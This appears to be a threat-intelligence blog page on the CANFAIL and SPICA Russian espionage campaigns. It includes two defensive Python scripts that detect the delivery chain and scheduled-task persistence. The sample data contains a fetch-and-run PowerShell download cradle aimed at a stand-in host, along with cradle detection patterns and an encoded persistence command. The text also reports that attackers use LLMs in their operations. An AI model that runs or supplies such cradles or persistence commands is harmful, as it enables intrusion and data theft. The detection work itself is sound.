Showing posts with label Russian threat actors.

Google Links CANFAIL Malware Attacks to Suspected Russia-Aligned Group

A newly identified cyber espionage group has been linked to a wave of digital attacks against Ukrainian institutions, according to findings released by the Google Threat Intelligence Group. Investigators say the activity involves a malware strain tracked as CANFAIL and assess that the operator is likely connected to Russian state intelligence interests.

The campaign has primarily focused on Ukrainian government structures at both regional and national levels. Entities tied to defense, the armed forces, and the energy sector have been repeatedly targeted. Analysts state that the selection of victims reflects strategic priorities consistent with wartime intelligence gathering.

Beyond these sectors, researchers observed that the actor’s attention has widened. Aerospace companies, manufacturers producing military equipment and drone technologies, nuclear and chemical research institutions, and international organizations engaged in conflict monitoring or humanitarian assistance in Ukraine have also been included in targeting efforts. This broader focus indicates an attempt to collect information across supply chains and support networks linked to the war.

While the group does not appear to possess the same operational depth as some established Russian hacking units, Google’s analysts note a recent shift in capability. The actor has reportedly begun using large language models to assist in reconnaissance, draft persuasive phishing content, and resolve technical challenges encountered after gaining initial access. These tools have also been used to help configure command-and-control infrastructure, allowing the attackers to manage compromised systems more effectively.

Email-based deception remains central to the intrusion strategy. In several recent operations, the attackers posed as legitimate Ukrainian energy providers in order to obtain unauthorized access to both organizational and personal email accounts. In separate incidents, they impersonated a Romanian energy supplier that serves Ukrainian clients. Investigators also documented targeting of a Romanian company and reconnaissance activity involving organizations in Moldova, suggesting regional expansion of the campaign.

To improve the precision of their phishing efforts, the attackers compile tailored email distribution lists based on geographic region and industry sector. The malicious messages frequently contain links hosted on Google Drive. These links direct recipients to download compressed RAR archives that contain the CANFAIL payload.

CANFAIL itself is a heavily obfuscated JavaScript file. It is typically named with a double extension such as “.pdf.js” so that, on a Windows system configured to hide known file extensions (the default), a file like “report.pdf.js” is displayed as “report.pdf” and passes for a document. When the victim opens it, the Windows script host runs it and the script launches a PowerShell command that retrieves a second-stage, PowerShell-based dropper. That second stage is executed in memory rather than written to disk, which reduces the forensic artifacts left behind and sidesteps file-based scanning. To keep the victim from becoming suspicious, the malware simultaneously displays a fabricated error dialog suggesting that the document failed to open. The obfuscation changes from sample to sample, but the process chain does not: a script host such as wscript.exe spawning powershell.exe with a download cradle is the most durable detection point.
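The delivery and execution chain described above (RAR archive, double-extension .js, script host spawning PowerShell with an in-memory cradle) leaves a clear trace in endpoint process-creation telemetry even when the JavaScript itself is unreadable. The following is an added example, not GTIG's code, that applies two detections to a few constructed Sysmon-style process events: a document-plus-script double extension on a script host's command line, and PowerShell spawned by wscript.exe or cscript.exe carrying download-cradle indicators. The events, paths, user name and URL are all invented for the example.

```python
"""Flag the CANFAIL delivery chain in process-creation telemetry.

Added example, not GTIG's code. The events below use Sysmon Event ID 1
field names (Image, ParentImage, CommandLine) but are constructed for this
example; the paths, user name and URL are invented.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# A document extension immediately followed by a Windows script extension,
# e.g. "Invoice.pdf.js": Explorer hides the known ".js" and shows "Invoice.pdf".
DOUBLE_EXT = re.compile(
    r"\.(?:pdf|docx?|xlsx?|pptx?|txt)\.(?:js|jse|vbs|vbe|wsf|hta)(?=[\s\"']|$)", re.I)

# Tokens typical of PowerShell download cradles and in-memory stagers.
CRADLE = re.compile(
    r"invoke-expression|\biex\b|downloadstring|downloadfile|net\.webclient|"
    r"invoke-webrequest|\biwr\b|frombase64string|-enc(?:odedcommand)?\b|"
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b",
    re.I,
)


def basename(path):
    """Case-folded file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return (rule, detail) findings for a single process-creation event."""
    findings = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")

    # Rule 1: a script host launched with a double-extension file.
    m = DOUBLE_EXT.search(cmd)
    if image in SCRIPT_HOSTS and m:
        findings.append(("double_extension_script", m.group(0)))

    # Rule 2: PowerShell whose parent is a script host; record any cradle tokens.
    if image in {"powershell.exe", "pwsh.exe"} and parent in SCRIPT_HOSTS:
        hits = sorted({h.group(0).lower() for h in CRADLE.finditer(cmd)})
        if hits:
            findings.append(("script_host_to_powershell_cradle", ",".join(hits)))
        else:
            findings.append(("script_host_to_powershell", cmd[:80]))
    return findings


def scan(events):
    """Run classify over a list of events; returns (ProcessId, finding) pairs."""
    return [(e["ProcessId"], f) for e in events for f in classify(e)]


# Constructed sample telemetry: one CANFAIL-style chain and one benign admin script.
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\olena\Downloads\Invoice.pdf.js"'},
    {"ProcessId": 4188,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                    '.DownloadString(\'http://example.invalid/stage2\')"'},
    {"ProcessId": 5200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for pid, (rule, detail) in scan(SAMPLE_EVENTS):
        print(f"pid={pid} {rule}: {detail}")
```

Tune DOUBLE_EXT to the document types your users actually receive, and expect some noise from the cradle tokens on hosts where administrators run scripts through WSH; the parent-child pairing carries most of the signal, which is why rule 2 fires on the relationship alone and only annotates it with the tokens it finds.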

Google’s researchers further link this activity to a campaign known as PhantomCaptcha, which SentinelOne’s SentinelLABS documented in October 2025. PhantomCaptcha targeted organizations involved in Ukraine-related relief efforts with phishing emails that sent recipients to fraudulent websites. Those sites presented fake verification instructions designed to get the victim to run the infection chain themselves, ultimately delivering a trojan that communicates with its operators over WebSocket channels.

The investigation illustrates how state-aligned actors continue to adapt their methods, combining traditional phishing tactics with newer technologies to sustain intelligence collection efforts tied to the conflict in Ukraine.

ColdRiver APT: Google TAG Warns That Russian APT Group Is Using a Custom Backdoor

Google has warned that a Russia-linked threat actor tracked as COLDRIVER, which has been expanding its target set, is now also deploying custom malware.

ColdRiver APT

The ColdRiver APT (also tracked as Seaborgium, Callisto, Star Blizzard and TA446) is a Russian cyberespionage group that has targeted government officials, military personnel, journalists and think tanks since at least 2015.

The group has a long record of phishing and credential-theft campaigns that have led to intrusions and data theft. Its targeting concentrates on NATO member states, though researchers have also observed activity against the Baltics, the Nordics and Eastern Europe, including Ukraine.

Google TAG researchers warn that COLDRIVER is refining its tactics, techniques and procedures (TTPs) in order to evade detection.

TAG has recently seen COLDRIVER use phishing to deliver bespoke malware, with PDF files as the lure. Google disrupted the attempts by adding all known domains and file hashes to Safe Browsing blocklists.

As far back as November 2022, TAG observed COLDRIVER sending targets PDF documents from impersonation accounts. The PDFs themselves are benign lures: the accompanying message asks the recipient for feedback on an opinion piece or similar article that the sender supposedly hopes to publish. When the victim opens the PDF, its text appears to be encrypted.

If the target replies that they cannot read the document, the attackers respond with a link to a supposed decryption utility hosted on a site they control. Running that utility installs the SPICA backdoor and opens a decoy document in the foreground.

“Once executed, SPICA decodes an embedded PDF, writes it to disk, and opens it as a decoy for the user. In the background, it establishes persistence and starts the main C2 loop, waiting for commands to execute,” reads TAG’s analysis. 

SPICA is a Rust backdoor that uses JSON over WebSockets for command and control. Its capabilities include:

  • Executing arbitrary shell commands.
  • Stealing cookies from Chrome, Firefox, Opera and Edge.
  • Uploading and downloading files.
  • Listing the contents of the filesystem.
  • Enumerating documents and exfiltrating them in an archive.
  • A command named “telegram”, whose function is unclear.

Persistence is established by an obfuscated PowerShell command that creates a scheduled task named CalendarChecker.
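Because the persistence mechanism is a named scheduled task, a hunt can start from exported task definitions rather than from the obfuscated PowerShell that created them. The following is an added example, not TAG's code: it parses the XML that schtasks /query /tn <name> /xml emits, flags a task whose name matches the CalendarChecker task TAG reported, and flags any task whose action launches PowerShell with a hidden window or an -EncodedCommand argument, decoding the latter from its Base64-over-UTF-16LE form. The two task definitions, the payload and the paths are constructed for the example; TAG's report names the task but does not publish what it executes, so the suspicious sample's action is invented.

```python
"""Hunt exported Windows scheduled tasks for SPICA-style persistence.

Added example, not Google TAG's code. Task definitions are the XML that
`schtasks /query /tn <name> /xml` emits. Both definitions below are
constructed for this example, and the suspicious task's action is invented:
TAG's report names the CalendarChecker task but not its command line.
"""
import base64
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
KNOWN_TASK_NAMES = {"calendarchecker"}   # task name reported by TAG for SPICA
# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


def encode_command(script):
    """Build the -EncodedCommand form PowerShell expects: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(b64):
    """Reverse of encode_command; raises on malformed Base64 or odd byte counts."""
    return base64.b64decode(b64, validate=True).decode("utf-16le")


def inspect_task(xml_text):
    """Return (rule, detail) findings for one task definition."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    name = uri.rsplit("\\", 1)[-1]          # "\Folder\Name" -> "Name"
    findings = []
    if name.lower() in KNOWN_TASK_NAMES:
        findings.append(("known_task_name", name))
    for action in root.findall("t:Actions/t:Exec", NS):
        cmd = action.findtext("t:Command", default="", namespaces=NS).lower()
        args = action.findtext("t:Arguments", default="", namespaces=NS)
        if "powershell" not in cmd and "pwsh" not in cmd:
            continue
        if HIDDEN.search(args):
            findings.append(("hidden_window", name))
        m = ENC_FLAG.search(args)
        if m:
            try:
                findings.append(("encoded_command", decode_encoded_command(m.group(1))))
            except (ValueError, UnicodeDecodeError):
                findings.append(("encoded_command_undecodable", m.group(1)[:32]))
    return findings


# Invented payload for the constructed suspicious task.
PAYLOAD = r"Start-Process -WindowStyle Hidden $env:APPDATA\Calendar\sync.exe"

# Constructed task definitions (real exports carry an XML declaration and are
# UTF-16; use ET.parse(path) on those, which honours the declaration).
SAMPLE_TASKS = {
    "suspicious": f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\CalendarChecker</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoProfile -w hidden -enc {encode_command(PAYLOAD)}</Arguments>
    </Exec>
  </Actions>
</Task>""",
    "benign": """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\\system32\\defrag.exe</Command>
      <Arguments>-c -h -o -$</Arguments>
    </Exec>
  </Actions>
</Task>""",
}

if __name__ == "__main__":
    for label, xml_text in SAMPLE_TASKS.items():
        for rule, detail in inspect_task(xml_text):
            print(f"{label}: {rule}: {detail}")
```

To run this against a host, export each task with schtasks /query /tn <name> /xml and pass the file to ET.parse, then call inspect_task on the root element's serialized form or adapt it to take the parsed root directly. The task name is the weakest of the three checks, since an operator can rename it at will; the hidden-window and encoded-command checks are what catch a renamed variant.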

TAG believes COLDRIVER has used SPICA since at least November 2022, although the researchers first observed the backdoor in the wild in early September 2023.